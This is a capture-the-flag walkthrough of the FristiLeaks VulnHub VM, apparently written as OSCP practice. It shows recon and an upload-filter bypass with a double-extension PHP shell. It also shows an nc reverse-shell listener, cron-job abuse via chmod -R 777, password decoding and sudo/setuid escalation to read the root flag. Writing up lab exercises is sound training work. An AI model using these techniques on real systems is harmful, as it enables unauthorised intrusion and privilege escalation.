FristiLeaks
This is my second box I have on my list to work through. As I mentioned earlier, these list is comprised of old boxes, but still can form a good challenge to work up to OSCP.
Recon
Starting with a nmap scan to find out which ports are open and what public facing services are running on the system.
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-607343288ed91350083242 inline="true" ]PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) | http-methods: | Supported Methods: GET HEAD POST OPTIONS TRACE |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_/cola /sisi /beer |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) |
[/crayon]
Port 80 with a webserver running behind it. The version of the webserver is Apache 2.2.15.
Nmap has guessed that the OS is CentOS.
There are some entries in the robots.txt file, but before I investigate the website, I’m going to check the known vulnerabilities of the Apache version.
|
1 2 3 4 5 6 7 8 9 |
[crayon-607343288ed98190755522 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # searchsploit apache 2.2.15 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result |
[/crayon]
Webserver
The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:
|
1 2 3 4 5 |
[crayon-607343288ed9c701389608 inline="true" ]<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA Goal: get UID 0 (root) and read the special flag file. Timeframe: should be doable in 4 hours. --> |
[/crayon]
The 3 entries in the
robots.txt file all point to the same picture, which looks like a red haring. Just to be sure I check the pic for meta data or other hidden data, but I can’t find anything.
Time to run dirSearch and bruteforce the website in hope of finding more files/folders.
Nothing……very frustrating. I tried different worklists, but all come back with the same results. Only the 3 drinks. I really cracked my head, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn’t in any of my lists, mostly because it is a particular Dutch drink……fristi
The result was a admin portal with some comments.
|
1 2 3 4 5 6 7 |
[crayon-607343288eda2747144205 inline="true" ]<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."> <!-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz --> |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
[crayon-607343288eda5512884232 inline="true" ]<!-- iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg== --> |
[/crayon]
There are several ways to decode this base64 comment. As it is an encoded PNG file, I just replace the initial picture on the site with this piece of code. The result is a picture with a string of letters:
keKkeKKeKKeKkEkkEk
A password? But what about the username? In the comment above there is name:
eezeepz
This username combined with the password gives me access to a page with an upload posibility.
Will it let me upload anything?
|
1 2 |
[crayon-607343288edac506221423 inline="true" ]Sorry, is not a valid file. Only allowed are: png,jpg,gif Sorry, file not uploaded |
[/crayon]
So it won’t let me upload a php file. Will it let me upload a file with the extention
php.jpg?
|
1 2 |
[crayon-607343288edb1471165600 inline="true" ]Uploading, please wait The file has been uploaded to /uploads |
[/crayon]
Yes, it will. Now to start up a listener and run the file from the browser.
|
1 2 3 |
[crayon-607343288edb5087866303 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # nc -lvnp 9999 listening on [any] 9999 ... |
[/crayon]
The file can be found in
/fristi/uploads/shell.php.jpg
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-607343288edba381547951 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # nc -lvnp 9999 listening on [any] 9999 ... connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595 Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 17:17:45 up 1:05, 0 users, load average: 0.00, 0.01, 0.20 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) sh: no job control in this shell sh-4.1$ |
[/crayon]
A good place to start is the www folder and look for things I’ve missed.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
[crayon-607343288edbe194970261 inline="true" ]sh-4.1$ cd /var/www cd /var/www sh-4.1$ ls -lah ls -lah total 28K drwxr-xr-x. 6 root root 4.0K Nov 17 2015 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. drwxr-xr-x. 2 root root 4.0K Aug 24 2015 cgi-bin drwxr-xr-x. 3 root root 4.0K Nov 17 2015 error drwxr-xr-x. 7 root root 4.0K Nov 25 2015 html drwxr-xr-x. 3 root root 4.0K Nov 17 2015 icons -rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt |
[/crayon]
A file called
notes.txt
|
1 2 3 4 5 6 |
[crayon-607343288edc3640524881 inline="true" ]sh-4.1$ cat notes.txt cat notes.txt hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry |
[/crayon]
In the home directory of user
eezeepz is a note:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
[crayon-607343288edc8818967457 inline="true" ]sh-4.1$ cat /home/eezeepz/notes.txt cat /home/eezeepz/notes.txt Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry |
[/crayon]
Ok, so I can try and use chmod to let me read more home folders. An important note is the piece of info in the note, that it is required to use the full path. So in this case I try
/usr/bin/chmod
|
1 2 |
[crayon-607343288edd8812663011 inline="true" ]sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis echo "/home/admin/chmod -R 777 /home/" > runthis |
[/crayon]
After a minute I check
/home and it seems like it worked.
|
1 2 3 4 5 6 7 8 |
[crayon-607343288edde489044669 inline="true" ]sh-4.1$ ls -lah /home ls -lah /home total 28K drwxr-xr-x. 5 root root 4.0K Nov 19 2015 . dr-xr-xr-x. 22 root root 4.0K May 27 16:11 .. drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
[crayon-607343288ede1924801195 inline="true" ]sh-4.1$ ls -lah ls -lah total 652K drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 . drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .. -rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout -rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile -rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc -rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat -rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod -rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py -rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt -rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py -rwxrwxrwx 1 admin admin 89K Nov 18 2015 df -rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo -rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep -rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep -rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps -rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt |
[/crayon]
A few python scripts and textfiles. Let’s look at the text file from fristigod.
|
1 2 3 |
[crayon-607343288ede4974362559 inline="true" ]sh-4.1$ cat whoisyourgodnow.txt cat whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG |
[/crayon]
Hmmm. What about the other text file.
|
1 2 3 |
[crayon-607343288ede8630780578 inline="true" ]sh-4.1$ cat cryptedpass.txt cat cryptedpass.txt mVGZ3O3omkJLmy2pcuTq |
[/crayon]
It isn’t base64. So let’s take a look at the python scripts.
|
1 2 3 4 5 6 7 8 9 |
[crayon-607343288edee061219939 inline="true" ]#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn import base64,codecs,sys def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13') cryptoResult=encodeString(sys.argv[1]) print cryptoResult |
[/crayon]
It starts with a strings, encode base64, reverses the string and finally rot13 encoding.
To make it readible again, I need to reverse this script. For this I can use a bash oneliner.
|
1 2 3 |
[crayon-607343288edf2315292869 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d thisisalsopw123 |
[/crayon]
|
1 2 3 |
[crayon-607343288edf5152238334 inline="true" ]┌──[root@n0w4n]─[~/vulnhub/fristileaks] └──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d LetThereBeFristi! |
[/crayon]
Ok. Let’s see if this is a password.
|
1 2 3 4 5 6 7 8 9 |
[crayon-607343288edf9027949889 inline="true" ]sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");' python -c 'import pty;pty.spawn("/bin/sh");' sh-4.1$ su fristigod su fristigod Password: LetThereBeFristi! bash-4.1$ id id uid=502(fristigod) gid=502(fristigod) groups=502(fristigod) |
[/crayon]
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[crayon-607343288edfd172067939 inline="true" ]bash-4.1$ cd /home cd /home bash-4.1$ ls ls admin eezeepz fristigod bash-4.1$ cd fristigod cd fristigod bash-4.1$ ls -lah ls -lah total 20K drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 . drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .. -rw-r--r-- 1 fristigod fristigod 18 Sep 22 2015 .bash_logout -rw-r--r-- 1 fristigod fristigod 176 Sep 22 2015 .bash_profile -rw-r--r-- 1 fristigod fristigod 124 Sep 22 2015 .bashrc |
[/crayon]
Nothing….but as we could see in
/etc/passwd the home folder was located in
/var/fristigod.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
[crayon-607343288ee04330797175 inline="true" ]bash-4.1$ cd /var/fristigod cd /var/fristigod bash-4.1$ ls -lah ls -lah total 16K drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff bash-4.1$ cd .secret_admin_stuff cd .secret_admin_stuff bash-4.1$ ls -lah ls -lah total 16K drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 . drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 .. -rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom bash-4.1$ file doCom file doCom doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped |
[/crayon]
An ELF file with the SGID/SUID bit set.
|
1 2 3 |
[crayon-607343288ee07815806221 inline="true" ]bash-4.1$ ./doCom ./doCom Nice try, but wrong user ;) |
[/crayon]
Hahaha….bummer.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[crayon-607343288ee0b665132945 inline="true" ]bash-4.1$ sudo -l sudo -l [sudo] password for fristigod: LetThereBeFristi! Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User fristigod may run the following commands on this host: (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom |
[/crayon]
|
1 2 3 |
[crayon-607343288ee12243710195 inline="true" ]bash-4.1$ sudo -u fristi ./doCom sudo -u fristi ./doCom Usage: ./program_name terminal_command ... |
[/crayon]
So I can run the file as fristi.
|
1 2 3 4 5 6 7 8 9 10 |
[crayon-607343288ee15902905352 inline="true" ]bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp sudo -u fristi ./doCom touch /var/fristigod/test.tmp bash-4.1$ ls -lah /var/fristigod ls -lah /var/fristigod total 16K drwxr-x--- 3 fristigod fristigod 4.0K May 27 18:31 . drwxr-xr-x. 19 root root 4.0K Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff -rw-r--r-- 1 root users 0 May 27 18:31 test.tmp |
[/crayon]
Nice.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
[crayon-607343288ee19041894393 inline="true" ]bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root sudo -u fristi ./doCom chmod -R 777 /root bash-4.1$ ls -lah /root ls -lah /root total 48K drwxrwxrwx. 3 root root 4.0K Nov 25 2015 . dr-xr-xr-x. 22 root root 4.0K May 27 16:11 .. -rwxrwxrwx 1 root root 1.9K Nov 25 2015 .bash_history -rwxrwxrwx. 1 root root 18 May 20 2009 .bash_logout -rwxrwxrwx. 1 root root 176 May 20 2009 .bash_profile -rwxrwxrwx. 1 root root 176 Sep 22 2004 .bashrc drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .c -rwxrwxrwx. 1 root root 100 Sep 22 2004 .cshrc -rwxrwxrwx. 1 root root 1.3K Nov 17 2015 .mysql_history -rwxrwxrwx. 1 root root 129 Dec 3 2004 .tcshrc -rwxrwxrwx. 1 root root 829 Nov 17 2015 .viminfo -rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt |
[/crayon]
|
1 2 3 4 5 6 7 8 9 |
[crayon-607343288ee1d645105545 inline="true" ]bash-4.1$ cat /root/fristileaks_secrets.txt cat /root/fristileaks_secrets.txt Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu] I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1 |
[/crayon]
And that was the challenge. Not to difficult and really a good one to try.